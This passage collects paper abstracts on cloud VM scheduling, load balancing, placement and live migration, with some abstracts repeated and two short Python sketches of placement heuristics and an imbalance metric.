machine live migration brings benefits such as improved performance, manageability and fault tolerance, while allowing workload movement with a short service downtime. However, service levels of applications are likely to be negatively affected during a live migration. For this reason, a better understanding of its effects on system performance is desirable.
In this paper, we evaluate the effects of live migration of virtual machines on the performance of applications running inside Xen VMs. Results show that, in most cases, migration overhead is acceptable but cannot be disregarded, especially in systems where availability and responsiveness are governed by strict Service Level Agreements. Despite that, there is a high potential for live migration applicability in data centers serving modern Internet applications. Our results are based on a workload covering the domain of multi-tier Web 2.0 applications. --- paper_title: Live migration of virtual machines paper_content: Migrating operating system instances across distinct physical hosts is a useful tool for administrators of data centers and clusters: It allows a clean separation between hardware and software, and facilitates fault management, load balancing, and low-level system maintenance. By carrying out the majority of migration while OSes continue to run, we achieve impressive performance with minimal service downtimes; we demonstrate the migration of entire OS instances on a commodity cluster, recording service downtimes as low as 60ms. We show that our performance is sufficient to make live migration a practical tool even for servers running interactive loads. In this paper we consider the design options for migrating OSes running services with liveness constraints, focusing on data center and cluster environments. We introduce and analyze the concept of writable working set, and present the design, implementation and evaluation of high-performance OS migration built on top of the Xen VMM. --- paper_title: A hybrid meta-heuristic algorithm for VM scheduling with load balancing in cloud computing paper_content: Virtual machine (VM) scheduling with load balancing in cloud computing aims to assign VMs to suitable servers and balance the resource usage among all of the servers. In an infrastructure-as-a-service framework, there will be dynamic input requests, where the system is in charge of creating VMs without considering what types of tasks run on them. Therefore, scheduling that focuses only on fixed task sets or that requires detailed task information is not suitable for this system. This paper combines ant colony optimization and particle swarm optimization to solve the VM scheduling problem, with the result being known as ant colony optimization with particle swarm (ACOPS). ACOPS uses historical information to predict the workload of new input requests to adapt to dynamic environments without additional task information. ACOPS also rejects requests that cannot be satisfied before scheduling to reduce the computing time of the scheduling procedure. Experimental results indicate that the proposed algorithm can keep the load balance in a dynamic environment and outperform other approaches. --- paper_title: Energy Efficient Multi Dimensional Host Load Aware Algorithm for Virtual Machine Placement and Optimization in Cloud Environment paper_content: The effectiveness and elasticity of virtual machine placement has become a main concern in the modern cloud computing environment. Mapping the virtual machines to the physical machine cluster is called VM placement. In this paper we present an efficient hybrid genetic based host load aware algorithm for scheduling and optimization of virtual machines in a cluster of physical hosts. We use two different techniques: first, initial VM packing is done by checking the load of the physical host and the user constraints of the VMs.
Second, optimization of the placed VMs is done using a hybrid genetic algorithm based on a fitness function. The presented algorithm is implemented in the Java NetBeans IDE, and a cloud simulator has been used for simulation to assess the execution and performance of our heuristics by comparison with the first-fit, best-fit and round-robin algorithms. The performance of the proposed algorithm was examined from both the users' and the service provider's perspective. The simulation results show that our proposed algorithm uses a smaller number of physical servers for placing a given number of VMs, which helps to improve the resource utilization rate. The response time of our algorithm is slightly higher than that of the first-fit algorithm because it allocates VMs based on the user constraints and the past usage history of the VMs. A higher SLA satisfaction rate and a lower load imbalance rate were observed in the results. Since we use a modified version of a hybrid genetic algorithm for load optimization, the percentage of VM migrations is decreased, through which better results for load balancing along with cost reduction can be achieved. The results also show that our hybrid genetic based multi dimensional host load aware and user constraints based algorithm is applicable, valuable and reliable for implementation in real data center environments. --- paper_title: Multi-Cloud: expectations and current approaches paper_content: Using resources and services from multiple Clouds is a natural evolution from consuming the ones from in-silo Clouds. Technological and administrative barriers are, however, slowing the process. Fortunately, recent years have been marked by the appearance of several solutions that partially overcome them. However, the approaches are quite varied and not adopted at large scale. This paper intends to offer a snapshot of the current state-of-the-art and to identify the future steps in building Multi-Clouds. A list of basic requirements for a Multi-Cloud is proposed. --- paper_title: A dynamic and integrated load-balancing scheduling algorithm for Cloud datacenters paper_content: One of the challenging scheduling problems in Cloud datacenters is to take the allocation and migration of reconfigurable virtual machines into consideration as well as the integrated features of hosting physical machines. We introduce a dynamic and integrated resource scheduling algorithm (DAIRS) for Cloud datacenters. Unlike traditional load-balance scheduling algorithms which consider only one factor such as the CPU load in physical servers, DAIRS treats CPU, memory and network bandwidth in an integrated way for both physical machines and virtual machines. We develop an integrated measurement of the total imbalance level of a Cloud datacenter as well as the average imbalance level of each server. Simulation results show that DAIRS has good performance with regard to total imbalance level, average imbalance level of each server, as well as overall running time. --- paper_title: A Scheduling Strategy on Load Balancing of Virtual Machine Resources in Cloud Computing Environment paper_content: Current virtual machine (VM) resource scheduling in the cloud computing environment mainly considers the current state of the system but seldom considers system variation and historical data, which always leads to load imbalance of the system. In view of the load balancing problem in VM resource scheduling, this paper presents a scheduling strategy on load balancing of VM resources based on a genetic algorithm.
According to historical data and the current state of the system, and through a genetic algorithm, this strategy computes in advance the influence that the deployment of the needed VM resources will have on the system, and then chooses the solution with the least effect, through which it achieves the best load balancing and reduces or avoids dynamic migration. This strategy solves the problem of load imbalance and high migration cost caused by traditional algorithms after scheduling. Experimental results prove that this method is able to realize load balancing and reasonable resource utilization both when the system load is stable and when it varies. --- paper_title: An online load balancing scheduling algorithm for cloud data centers considering real-time multi-dimensional resource paper_content: In general, load-balance scheduling is an NP-hard problem, as proved in much of the open literature. We introduce an online load balancing resource scheduling algorithm (OLRSA) for Cloud datacenters considering real-time and multi-dimensional resources. Unlike traditional load balance scheduling algorithms which often consider only one factor such as the CPU load in physical servers, OLRSA treats CPU, memory and network bandwidth in an integrated way for both physical machines and virtual machines. We develop and apply an integrated measurement for each server and for the Cloud datacenter. Simulation results show that OLRSA has better performance than a few related load-balancing algorithms with regard to total imbalance level, makespan, as well as overall load efficiency. --- paper_title: A comparison of centralized and distributed meta-scheduling architectures for computation and communication tasks in Grid networks paper_content: The management of Grid resources requires scheduling of both computation and communication tasks at various levels. In this study, we consider the two constituent sub-problems of Grid scheduling, namely: (i) the scheduling of computation tasks to processing resources and (ii) the routing and scheduling of the data movement in a Grid network. Regarding computation tasks, we examine two typical online task scheduling algorithms that employ advance reservations and perform full network simulation experiments to measure their performance when implemented in a centralized or distributed manner. Similarly, for communication tasks, we compare two routing and data scheduling algorithms that are implemented in a centralized or a distributed manner. We examine the effect network propagation delay has on the performance of these algorithms. Our simulation results indicate that a distributed architecture with an exhaustive resource utilization update strategy yields better average end-to-end delay performance than a centralized architecture. --- paper_title: CloudCmp: comparing public cloud providers paper_content: While many public cloud providers offer pay-as-you-go computing, their varying approaches to infrastructure, virtualization, and software services lead to a problem of plenty. To help customers pick a cloud that fits their needs, we develop CloudCmp, a systematic comparator of the performance and cost of cloud providers. CloudCmp measures the elastic computing, persistent storage, and networking services offered by a cloud along metrics that directly reflect their impact on the performance of customer applications. CloudCmp strives to ensure fairness, representativeness, and compliance of these measurements while limiting measurement cost.
Applying CloudCmp to four cloud providers that together account for most of the cloud customers today, we find that their offered services vary widely in performance and costs, underscoring the need for thoughtful provider selection. From case studies on three representative cloud applications, we show that CloudCmp can guide customers in selecting the best-performing provider for their applications. --- paper_title: Virtual machine mapping policy based on load balancing in private cloud environment paper_content: The virtual machine allocation problem is the key to build a private cloud environment. This paper presents a virtual machine mapping policy based on multi-resource load balancing. It uses the resource consumption of the running virtual machine and the self-adaptive weighted approach, which resolves the load balancing conflicts of each independent resource caused by different demand for resources of cloud applications. Meanwhile, it uses probability approach to ease the problem of load crowding in the concurrent users scene. The experiments and comparative analysis show that this policy achieves the better effect than existing approach. --- paper_title: A Load Balancing Scheme Using Federate Migration Based on Virtual Machines for Cloud Simulations paper_content: A maturing and promising technology, Cloud computing can benefit large-scale simulations by providing on-demand, anywhere simulation services to users. In order to enable multitask and multiuser simulation systems with Cloud computing, Cloud simulation platform (CSP) was proposed and developed. To use key techniques of Cloud computing such as virtualization to promote the running efficiency of large-scale military HLA systems, this paper proposes a new type of federate container, virtual machine (VM), and its dynamic migration algorithm considering both computation and communication cost. Experiments show that the migration scheme effectively improves the running efficiency of HLA system when the distributed system is not saturated. --- paper_title: Cloud Data Management paper_content: In practice, the design and architecture of a cloud varies among cloud providers. We present a generic evaluation framework for the performance, availability and reliability characteristics of various cloud platforms. We describe a generic benchmark architecture for cloud databases, specifically NoSQL database as a service. It measures the performance of replication delay and monetary cost. Service Level Agreements (SLA) represent the contract which captures the agreed upon guarantees between a service provider and its customers. The specifications of existing service level agreements (SLA) for cloud services are not designed to flexibly handle even relatively straightforward performance and technical requirements of consumer applications. We present a novel approach for SLA-based management of cloud-hosted databases from the consumer perspective and an end-to-end framework for consumer-centric SLA management of cloud-hosted databases. The framework facilitates adaptive and dynamic provisioning of the database tier of the software applications based on application-defined policies for satisfying their own SLA performance requirements, avoiding the cost of any SLA violation and controlling the monetary cost of the allocated computing resources. In this framework, the SLA of the consumer applications are declaratively defined in terms of goals which are subjected to a number of constraints that are specific to the application requirements. 
The framework continuously monitors the application-defined SLA and automatically triggers the execution of necessary corrective actions (scaling out/in the database tier) when required. The framework is database platform-agnostic, uses virtualization-based database replication mechanisms and requires zero source code changes of the cloud-hosted software applications. --- paper_title: Cloud computing: state-of-the-art and research challenges paper_content: Cloud computing has recently emerged as a new paradigm for hosting and delivering services over the Internet. Cloud computing is attractive to business owners as it eliminates the requirement for users to plan ahead for provisioning, and allows enterprises to start from the small and increase resources only when there is a rise in service demand. However, despite the fact that cloud computing offers huge opportunities to the IT industry, the development of cloud computing technology is currently at its infancy, with many issues still to be addressed. In this paper, we present a survey of cloud computing, highlighting its key concepts, architectural principles, state-of-the-art implementation as well as research challenges. The aim of this paper is to provide a better understanding of the design challenges of cloud computing and identify important research directions in this increasingly important area. --- paper_title: Above the Clouds: A Berkeley View of Cloud Computing paper_content: Cloud Computing, the long-held dream of computing as a utility, has the potential to transform a large part of the IT industry, making software even more attractive as a service and shaping the way IT hardware is designed and purchased. Developers with innovative ideas for new Internet services no longer require the large capital outlays in hardware to deploy their service or the human expense to operate it. They need not be concerned about overprovisioning for a service whose popularity does not meet their predictions, thus wasting costly resources, or underprovisioning for one that becomes wildly popular, thus missing potential customers and revenue. Moreover, companies with large batch-oriented tasks can get results as quickly as their programs can scale, since using 1000 servers for one hour costs no more than using one server for 1000 hours. This elasticity of resources, without paying a premium for large scale, is unprecedented in the history of IT. Cloud Computing refers to both the applications delivered as services over the Internet and the hardware and systems software in the datacenters that provide those services. The services themselves have long been referred to as Software as a Service (SaaS). The datacenter hardware and software is what we will call a Cloud. When a Cloud is made available in a pay-as-you-go manner to the general public, we call it a Public Cloud; the service being sold is Utility Computing. We use the term Private Cloud to refer to internal datacenters of a business or other organization, not made available to the general public. Thus, Cloud Computing is the sum of SaaS and Utility Computing, but does not include Private Clouds. People can be users or providers of SaaS, or users or providers of Utility Computing. We focus on SaaS Providers (Cloud Users) and Cloud Providers, which have received less attention than SaaS Users. From a hardware point of view, three aspects are new in Cloud Computing. 
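Several of the placement algorithms cited in this section use first fit, best fit and round robin as baselines. For reference, the following is a minimal sketch of first-fit and best-fit placement over two resource dimensions; the data model, the CPU/memory dimensions and the "least total remaining slack" criterion for best fit are illustrative assumptions rather than the exact formulations of any cited paper.

```python
# Illustrative sketch of first-fit and best-fit VM placement over two
# resource dimensions (CPU, memory). The data model and the "least
# remaining slack" scoring for best fit are assumptions for this example.
from dataclasses import dataclass
from typing import List, Optional

@dataclass
class VM:
    cpu: float   # requested CPU (e.g., cores)
    mem: float   # requested memory (e.g., GB)

@dataclass
class PM:
    cpu_cap: float
    mem_cap: float
    cpu_used: float = 0.0
    mem_used: float = 0.0

    def fits(self, vm: VM) -> bool:
        return (self.cpu_used + vm.cpu <= self.cpu_cap and
                self.mem_used + vm.mem <= self.mem_cap)

    def place(self, vm: VM) -> None:
        self.cpu_used += vm.cpu
        self.mem_used += vm.mem

def first_fit(vm: VM, pms: List[PM]) -> Optional[int]:
    """Place the VM on the first PM that can host it; return its index."""
    for i, pm in enumerate(pms):
        if pm.fits(vm):
            pm.place(vm)
            return i
    return None  # request cannot be satisfied

def best_fit(vm: VM, pms: List[PM]) -> Optional[int]:
    """Place the VM on the feasible PM left with the least total slack."""
    best_i, best_slack = None, float("inf")
    for i, pm in enumerate(pms):
        if pm.fits(vm):
            slack = ((pm.cpu_cap - pm.cpu_used - vm.cpu) +
                     (pm.mem_cap - pm.mem_used - vm.mem))
            if slack < best_slack:
                best_i, best_slack = i, slack
    if best_i is not None:
        pms[best_i].place(vm)
    return best_i
```

With a list of hosts such as `[PM(16, 64) for _ in range(4)]`, `first_fit(VM(2, 8), pms)` returns the index of the chosen host and updates its usage in place; round robin would simply cycle the starting index between requests.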
--- paper_title: A dynamic and integrated load-balancing scheduling algorithm for Cloud datacenters paper_content: One of the challenging scheduling problems in Cloud datacenters is to take the allocation and migration of reconfigurable virtual machines into consideration as well as the integrated features of hosting physical machines. We introduce a dynamic and integrated resource scheduling algorithm (DAIRS) for Cloud datacenters. Unlike traditional load-balance scheduling algorithms which consider only one factor such as the CPU load in physical servers, DAIRS treats CPU, memory and network bandwidth integrated for both physical machines and virtual machines. We develop integrated measurement for the total imbalance level of a Cloud datacenter as well as the average imbalance level of each server. Simulation results show that DAIRS has good performance with regard to total imbalance level, average imbalance level of each server, as well as overall running time. --- paper_title: Virtual machine mapping policy based on load balancing in private cloud environment paper_content: The virtual machine allocation problem is the key to build a private cloud environment. This paper presents a virtual machine mapping policy based on multi-resource load balancing. It uses the resource consumption of the running virtual machine and the self-adaptive weighted approach, which resolves the load balancing conflicts of each independent resource caused by different demand for resources of cloud applications. Meanwhile, it uses probability approach to ease the problem of load crowding in the concurrent users scene. The experiments and comparative analysis show that this policy achieves the better effect than existing approach. --- paper_title: A hybrid meta-heuristic algorithm for VM scheduling with load balancing in cloud computing paper_content: Virtual machine (VM) scheduling with load balancing in cloud computing aims to assign VMs to suitable servers and balance the resource usage among all of the servers. In an infrastructure-as-a-service framework, there will be dynamic input requests, where the system is in charge of creating VMs without considering what types of tasks run on them. Therefore, scheduling that focuses only on fixed task sets or that requires detailed task information is not suitable for this system. This paper combines ant colony optimization and particle swarm optimization to solve the VM scheduling problem, with the result being known as ant colony optimization with particle swarm (ACOPS). ACOPS uses historical information to predict the workload of new input requests to adapt to dynamic environments without additional task information. ACOPS also rejects requests that cannot be satisfied before scheduling to reduce the computing time of the scheduling procedure. Experimental results indicate that the proposed algorithm can keep the load balance in a dynamic environment and outperform other approaches. --- paper_title: Metaheuristics: From Design to Implementation paper_content: A unified view of metaheuristics This book provides a complete background on metaheuristics and shows readers how to design and implement efficient algorithms to solve complex optimization problems across a diverse range of applications, from networking and bioinformatics to engineering design, routing, and scheduling. It presents the main design questions for all families of metaheuristics and clearly illustrates how to implement the algorithms under a software framework to reuse both the design and code. 
Throughout the book, the key search components of metaheuristics are considered as a toolbox for: Designing efficient metaheuristics (e.g. local search, tabu search, simulated annealing, evolutionary algorithms, particle swarm optimization, scatter search, ant colonies, bee colonies, artificial immune systems) for optimization problems Designing efficient metaheuristics for multi-objective optimization problems Designing hybrid, parallel, and distributed metaheuristics Implementing metaheuristics on sequential and parallel machines Using many case studies and treating design and implementation independently, this book gives readers the skills necessary to solve large-scale optimization problems quickly and efficiently. It is a valuable reference for practicing engineers and researchers from diverse areas dealing with optimization or machine learning; and graduate students in computer science, operations research, control, engineering, business and management, and applied mathematics. --- paper_title: Virtual machine mapping policy based on load balancing in private cloud environment paper_content: The virtual machine allocation problem is the key to build a private cloud environment. This paper presents a virtual machine mapping policy based on multi-resource load balancing. It uses the resource consumption of the running virtual machine and the self-adaptive weighted approach, which resolves the load balancing conflicts of each independent resource caused by different demand for resources of cloud applications. Meanwhile, it uses probability approach to ease the problem of load crowding in the concurrent users scene. The experiments and comparative analysis show that this policy achieves the better effect than existing approach. --- paper_title: A Load Balancing Scheme Using Federate Migration Based on Virtual Machines for Cloud Simulations paper_content: A maturing and promising technology, Cloud computing can benefit large-scale simulations by providing on-demand, anywhere simulation services to users. In order to enable multitask and multiuser simulation systems with Cloud computing, Cloud simulation platform (CSP) was proposed and developed. To use key techniques of Cloud computing such as virtualization to promote the running efficiency of large-scale military HLA systems, this paper proposes a new type of federate container, virtual machine (VM), and its dynamic migration algorithm considering both computation and communication cost. Experiments show that the migration scheme effectively improves the running efficiency of HLA system when the distributed system is not saturated. --- paper_title: A distributed and collaborative dynamic load balancer for virtual machine paper_content: With the number of services using virtualization and clouds growing faster and faster, it is common to mutualize thousands of virtual machines within one distributed system. Consequently, the virtualized services, softwares, hardwares and infrastructures share the same physical resources, thus the performance of one depends of the resources usage of others. We propose a solution for vm load balancing (and rebalancing) based on the observation of the resources quota and the dynamic usage that leads to better balancing of resources. As it is not possible to have a single scheduler for the whole cloud and to avoid a single point of failure, our scheduler uses distributed and collaborative scheduling agents. 
We present scenarios simulating various cloud resources and vm usage experimented on our testbed p2p architecture. --- paper_title: Cloud brokering mechanisms for optimized placement of virtual machines across multiple providers paper_content: In the past few years, we have witnessed the proliferation of a heterogeneous ecosystem of cloud providers, each one with a different infrastructure offer and pricing policy. We explore this heterogeneity in a novel cloud brokering approach that optimizes placement of virtual infrastructures across multiple clouds and also abstracts the deployment and management of infrastructure components in these clouds. The feasibility of our approach is evaluated in a high throughput computing cluster case study. Experimental results confirm that multi-cloud deployment provides better performance and lower costs compared to the usage of a single cloud only. --- paper_title: A Scheduling Strategy on Load Balancing of Virtual Machine Resources in Cloud Computing Environment paper_content: The current virtual machine(VM) resources scheduling in cloud computing environment mainly considers the current state of the system but seldom considers system variation and historical data, which always leads to load imbalance of the system. In view of the load balancing problem in VM resources scheduling, this paper presents a scheduling strategy on load balancing of VM resources based on genetic algorithm. According to historical data and current state of the system and through genetic algorithm, this strategy computes ahead the influence it will have on the system after the deployment of the needed VM resources and then chooses the least-affective solution, through which it achieves the best load balancing and reduces or avoids dynamic migration. This strategy solves the problem of load imbalance and high migration cost by traditional algorithms after scheduling. Experimental results prove that this method is able to realize load balancing and reasonable resources utilization both when system load is stable and variant. --- paper_title: An online load balancing scheduling algorithm for cloud data centers considering real-time multi-dimensional resource paper_content: In general, load-balance scheduling is NP-hard problem as proved in many open literatures. We introduce an online load balancing resource scheduling algorithm (OLRSA) for Cloud datacenters considering real-time and multi-dimensional resources. Unlike traditional load balance scheduling algorithms which often consider only one factor such as the CPU load in physical servers, OLRSA treats CPU, memory and network bandwidth integrated for both physical machines and virtual machines. We develop and apply integrated measurement for each server and a Cloud datacenter. Simulation results show that OLRSA has better performance than a few related load-balancing algorithms with regard to total imbalance level, makespan, as well as overall load efficiency. 
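Both OLRSA above and DAIRS rely on an integrated load measure that combines CPU, memory and network bandwidth utilization per server, and then summarize the imbalance across the whole datacenter. The exact weights and imbalance definitions are specific to those papers; the sketch below uses equal weights and the mean absolute deviation from the average integrated load purely as an illustration of the idea.

```python
# Illustrative integrated-load and imbalance computation, loosely in the
# spirit of DAIRS/OLRSA. Equal weights and mean absolute deviation are
# assumptions of this sketch, not the cited papers' exact metrics.
from typing import Dict, List, Optional

RESOURCES = ("cpu", "mem", "bw")

def integrated_load(util: Dict[str, float],
                    weights: Optional[Dict[str, float]] = None) -> float:
    """Weighted average of per-resource utilizations (each in [0, 1])."""
    if weights is None:
        weights = {r: 1.0 / len(RESOURCES) for r in RESOURCES}
    return sum(weights[r] * util[r] for r in RESOURCES)

def imbalance_level(servers: List[Dict[str, float]]) -> float:
    """Mean absolute deviation of integrated loads across all servers."""
    loads = [integrated_load(u) for u in servers]
    avg = sum(loads) / len(loads)
    return sum(abs(load - avg) for load in loads) / len(loads)

if __name__ == "__main__":
    cluster = [
        {"cpu": 0.80, "mem": 0.60, "bw": 0.40},
        {"cpu": 0.20, "mem": 0.30, "bw": 0.10},
        {"cpu": 0.50, "mem": 0.50, "bw": 0.50},
    ]
    print("imbalance level:", round(imbalance_level(cluster), 3))
```

A scheduler in this style would pick, for each new VM, the feasible server whose placement minimizes the resulting imbalance level.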
--- paper_title: Performance vector-based algorithm for virtual machine deployment in infrastructure clouds paper_content: Regarding the virtual machine deployment issues in cloud computing,the Performance Matching-Load Balancing(PM-LB) algorithm of virtual machine deployment was proposed.With performance vector,the performance standardization of virtual infrastructure was described.The matching vector was obtained by calculating the relative vector distance of virtual machine and the servers,then a comprehensive analysis of matching vector and load balancing vector was done to get the deployment result.The results of simulation in CloudSim environment prove that using the proposed algorithm can obtain better load-balancing performance and higher resource utilization. --- paper_title: Cloud brokering mechanisms for optimized placement of virtual machines across multiple providers paper_content: In the past few years, we have witnessed the proliferation of a heterogeneous ecosystem of cloud providers, each one with a different infrastructure offer and pricing policy. We explore this heterogeneity in a novel cloud brokering approach that optimizes placement of virtual infrastructures across multiple clouds and also abstracts the deployment and management of infrastructure components in these clouds. The feasibility of our approach is evaluated in a high throughput computing cluster case study. Experimental results confirm that multi-cloud deployment provides better performance and lower costs compared to the usage of a single cloud only. --- paper_title: A hybrid meta-heuristic algorithm for VM scheduling with load balancing in cloud computing paper_content: Virtual machine (VM) scheduling with load balancing in cloud computing aims to assign VMs to suitable servers and balance the resource usage among all of the servers. In an infrastructure-as-a-service framework, there will be dynamic input requests, where the system is in charge of creating VMs without considering what types of tasks run on them. Therefore, scheduling that focuses only on fixed task sets or that requires detailed task information is not suitable for this system. This paper combines ant colony optimization and particle swarm optimization to solve the VM scheduling problem, with the result being known as ant colony optimization with particle swarm (ACOPS). ACOPS uses historical information to predict the workload of new input requests to adapt to dynamic environments without additional task information. ACOPS also rejects requests that cannot be satisfied before scheduling to reduce the computing time of the scheduling procedure. Experimental results indicate that the proposed algorithm can keep the load balance in a dynamic environment and outperform other approaches. --- paper_title: Energy Efficient Multi Dimensional Host Load Aware Algorithm for Virtual Machine Placement and Optimization in Cloud Environment paper_content: The effectiveness and elasticity of virtual machine placement has become a main concern in modern cloud computing environment. Mapping the virtual machines to the physical machines cluster is called the VM placement. In this paper we present an efficient hybrid genetic based host load aware algorithm for scheduling and optimization of virtual machines in a cluster of Physical hosts. We used two different techniques, first initial VM packing is done by checking the load of the physical host and the user constraints of the VMs. 
Second optimization of placed VMs is done by using a hybrid genetic algorithm based on fitness function. The presented algorithm is implemented in JAVA Net beans IDE, and Clouds simulator has been used for simulation to assess the execution and performance of our heuristics by comparison with algorithms first fit, best fit and round robin. The performance of the proposed algorithm was examined from both users and service provider’s perception. The simulation results show that our proposed algorithm uses the less number of physical servers for placing a certain number of VMs which helps to improve the resource utilization rate. The response time of our algorithm is little bit more than the first fit algorithm because of its nature of allocating VMs is based on the user constraints and past usage history of the VMs. Elevated SLA satisfaction rate and inferior load imbalance rate was observed in results. Since we used a modified version of hybrid genetic algorithm for load optimization the percentage of VM migrations had been decreased through which we can achieve the better results for load balancing along with cost reduction. The results also show that our hybrid genetic based multi dimensional host load aware and user constraints based algorithm is applicable, valuable and reliable for implementation in real data center environments. --- paper_title: A dynamic and integrated load-balancing scheduling algorithm for Cloud datacenters paper_content: One of the challenging scheduling problems in Cloud datacenters is to take the allocation and migration of reconfigurable virtual machines into consideration as well as the integrated features of hosting physical machines. We introduce a dynamic and integrated resource scheduling algorithm (DAIRS) for Cloud datacenters. Unlike traditional load-balance scheduling algorithms which consider only one factor such as the CPU load in physical servers, DAIRS treats CPU, memory and network bandwidth integrated for both physical machines and virtual machines. We develop integrated measurement for the total imbalance level of a Cloud datacenter as well as the average imbalance level of each server. Simulation results show that DAIRS has good performance with regard to total imbalance level, average imbalance level of each server, as well as overall running time. --- paper_title: Prepartition: A new paradigm for the load balance of virtual machine reservations in data centers paper_content: It is significant to apply load-balancing strategy to improve the performance and reliability of resource in data centers. One of the challenging scheduling problems in Cloud data centers is to take the allocation and migration of reconfigurable virtual machines (VMs) as well as the integrated features of hosting physical machines (PMs) into consideration. In the reservation model, workload of data centers has fixed process interval characteristics. In general, load-balance scheduling is NP-hard problem as proved in many open literatures. Traditionally, for offline load balance without migration, one of the best approaches is LPT (Longest Process Time first), which is well known to have approximation ratio 4/3. With virtualization, reactive (post) migration of VMs after allocation is one popular way for load balance and traffic consolidation. However, reactive migration has difficulty to reach predefined load balance objectives, and may cause interruption and instability of service and other associated costs. 
In view of this, we propose a new paradigm-Prepartition: it proactively sets process-time bound for each request on each PM and prepares in advance to migrate VMs to achieve the predefined balance goal. Prepartition can reduce process time by preparing VM migration in advance and therefore reduce instability and achieve better load balance as desired. Trace-driven and synthetic simulation results show that Prepartition has 10%-20% better performance than the well known load balancing algorithms with regard to average CPU utilization, makespan as well as capacity makespan. --- paper_title: Performance evaluation of web servers using central load balancing policy over virtual machines on cloud paper_content: Cloud Computing adds more power to the existing Internet technologies. Virtualization harnesses the power of the existing infrastructure and resources. With virtualization we can simultaneously run multiple instances of different commodity operating systems. Since we have limited processors and jobs work in concurrent fashion, overload situations can occur. Things become even more challenging in distributed environment. We propose Central Load Balancing Policy for Virtual Machines (CLBVM) to balance the load evenly in a distributed virtual machine/cloud computing environment. This work tries to compare the performance of web servers based on our CLBVM policy and independent virtual machine(VM) running on a single physical server using Xen Virtualizaion. The paper discusses the efficacy and feasibility of using this kind of policy for overall performance improvement. --- paper_title: A Quadratic Equilibrium Entropy Based Virtual Machine Load Balance Evaluation Algorithm paper_content: Aiming at virtual machine load balance evaluation, this paper proposes an evaluation algorithm based on quadratic equilibrium entropy. Firstly, we propose the computational methods for linear equilibrium and quadratic equilibrium entropy. Secondly, we analyze the physical meanings of linear equilibrium and quadratic equilibrium, and analyze their application method in virtual machine load balance. Finally, we prove our scheme by giving experimental results. --- paper_title: A distributed and collaborative dynamic load balancer for virtual machine paper_content: With the number of services using virtualization and clouds growing faster and faster, it is common to mutualize thousands of virtual machines within one distributed system. Consequently, the virtualized services, softwares, hardwares and infrastructures share the same physical resources, thus the performance of one depends of the resources usage of others. We propose a solution for vm load balancing (and rebalancing) based on the observation of the resources quota and the dynamic usage that leads to better balancing of resources. As it is not possible to have a single scheduler for the whole cloud and to avoid a single point of failure, our scheduler uses distributed and collaborative scheduling agents. We present scenarios simulating various cloud resources and vm usage experimented on our testbed p2p architecture. --- paper_title: Server-storage virtualization: integration and load balancing in data centers paper_content: We describe the design of an agile data center with integrated server and storage virtualization technologies. Such data centers form a key building block for new cloud computing architectures. 
We also show how to leverage this integrated agility for non-disruptive load balancing in data centers across multiple resource layers - servers, switches, and storage. We propose a novel load balancing algorithm called VectorDot for handling the hierarchical and multi-dimensional resource constraints in such systems. The algorithm, inspired by the successful Toyoda method for multi-dimensional knapsacks, is the first of its kind. We evaluate our system on a range of synthetic and real data center testbeds comprising VMware ESX servers, IBM SAN Volume Controller, and Cisco and Brocade switches. Experiments under varied conditions demonstrate the end-to-end validity of our system and the ability of VectorDot to efficiently remove overloads on server, switch and storage nodes. --- paper_title: Cloud brokering mechanisms for optimized placement of virtual machines across multiple providers paper_content: In the past few years, we have witnessed the proliferation of a heterogeneous ecosystem of cloud providers, each one with a different infrastructure offer and pricing policy. We explore this heterogeneity in a novel cloud brokering approach that optimizes placement of virtual infrastructures across multiple clouds and also abstracts the deployment and management of infrastructure components in these clouds. The feasibility of our approach is evaluated in a high throughput computing cluster case study. Experimental results confirm that multi-cloud deployment provides better performance and lower costs compared to the usage of a single cloud only. --- paper_title: A dynamic and integrated load-balancing scheduling algorithm for Cloud datacenters paper_content: One of the challenging scheduling problems in Cloud datacenters is to take the allocation and migration of reconfigurable virtual machines into consideration as well as the integrated features of hosting physical machines. We introduce a dynamic and integrated resource scheduling algorithm (DAIRS) for Cloud datacenters. Unlike traditional load-balance scheduling algorithms which consider only one factor such as the CPU load in physical servers, DAIRS treats CPU, memory and network bandwidth in an integrated manner for both physical machines and virtual machines. We develop an integrated measurement for the total imbalance level of a Cloud datacenter as well as the average imbalance level of each server. Simulation results show that DAIRS has good performance with regard to total imbalance level, average imbalance level of each server, as well as overall running time. --- paper_title: Open-Source Simulators for Cloud Computing: Comparative Study and Challenging Issues paper_content: Resource scheduling in infrastructure as a service (IaaS) is one of the keys for large-scale Cloud applications. Extensive research on all issues in a real environment is extremely difficult because it requires developers to consider the network infrastructure and the environment, which may be beyond their control. In addition, the network conditions cannot be controlled or predicted. Performance evaluations of workload models and Cloud provisioning algorithms in a repeatable manner under different configurations are difficult. Therefore, simulators are developed. To better understand and apply the state-of-the-art of Cloud computing simulators, and to improve them, we study four known open-source simulators. They are compared in terms of architecture, modeling elements, simulation process, performance metrics and scalability in performance.
Finally, a few challenging issues as future research trends are outlined. --- paper_title: Prepartition: A new paradigm for the load balance of virtual machine reservations in data centers paper_content: It is significant to apply load-balancing strategy to improve the performance and reliability of resource in data centers. One of the challenging scheduling problems in Cloud data centers is to take the allocation and migration of reconfigurable virtual machines (VMs) as well as the integrated features of hosting physical machines (PMs) into consideration. In the reservation model, workload of data centers has fixed process interval characteristics. In general, load-balance scheduling is NP-hard problem as proved in many open literatures. Traditionally, for offline load balance without migration, one of the best approaches is LPT (Longest Process Time first), which is well known to have approximation ratio 4/3. With virtualization, reactive (post) migration of VMs after allocation is one popular way for load balance and traffic consolidation. However, reactive migration has difficulty to reach predefined load balance objectives, and may cause interruption and instability of service and other associated costs. In view of this, we propose a new paradigm-Prepartition: it proactively sets process-time bound for each request on each PM and prepares in advance to migrate VMs to achieve the predefined balance goal. Prepartition can reduce process time by preparing VM migration in advance and therefore reduce instability and achieve better load balance as desired. Trace-driven and synthetic simulation results show that Prepartition has 10%-20% better performance than the well known load balancing algorithms with regard to average CPU utilization, makespan as well as capacity makespan. --- paper_title: FlexCloud: A Flexible and Extendible Simulator for Performance Evaluation of Virtual Machine Allocation paper_content: Cloud Data centers aim to provide reliable, sustainable and scalable services for all kinds of applications. Resource scheduling is one of keys to cloud services. To model and evaluate different scheduling policies and algorithms, we propose FlexCloud, a flexible and scalable simulator that enables users to simulate the process of initializing cloud data centers, allocating virtual machine requests and providing performance evaluation for various scheduling algorithms. FlexCloud can be run on a single computer with JVM to simulate large scale cloud environments with focus on infrastructure as a service; adopts agile design patterns to assure the flexibility and extensibility; models virtual machine migrations which is lack in the existing tools; provides user-friendly interfaces for customized configurations and replaying. Comparing to existing simulators, FlexCloud has combining features for supporting public cloud providers, load-balance and 